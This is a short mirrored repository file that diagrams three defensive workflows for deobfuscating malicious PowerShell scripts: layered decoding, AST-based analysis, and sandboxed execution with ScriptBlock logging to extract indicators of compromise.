mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-11 13:44:56 +03:00
mukul975
2.3 KiB
2.3 KiB
PowerShell Deobfuscation Workflows
Workflow 1: Automated Multi-Layer Deobfuscation
[Obfuscated Script] --> [Identify Techniques] --> [Remove Tick Marks]
|
v
[Resolve Concatenation]
|
v
[Decode Base64 Layers]
|
v
[IEX -> Write-Output]
|
v
[Extract Final Payload]
Workflow 2: AST-Based Analysis
[Script Input] --> [Parse AST] --> [Walk Expression Nodes] --> [Evaluate Expressions]
|
v
[Reconstruct Commands]
|
v
[Extract IOCs]
Workflow 3: Dynamic Sandbox Deobfuscation
[Obfuscated Script] --> [Execute in Sandbox] --> [Capture ScriptBlock Logs]
|
v
[Event ID 4104 Analysis]
|
v
[Reconstruct Execution Chain]
Steps:
- Enable Logging: Enable PowerShell ScriptBlock logging (Event ID 4104)
- Execute: Run obfuscated script in isolated sandbox
- Collect: Gather all ScriptBlock log entries
- Reconstruct: Assemble deobfuscated script from logged blocks
- Extract: Pull IOCs from the reconstructed clear-text script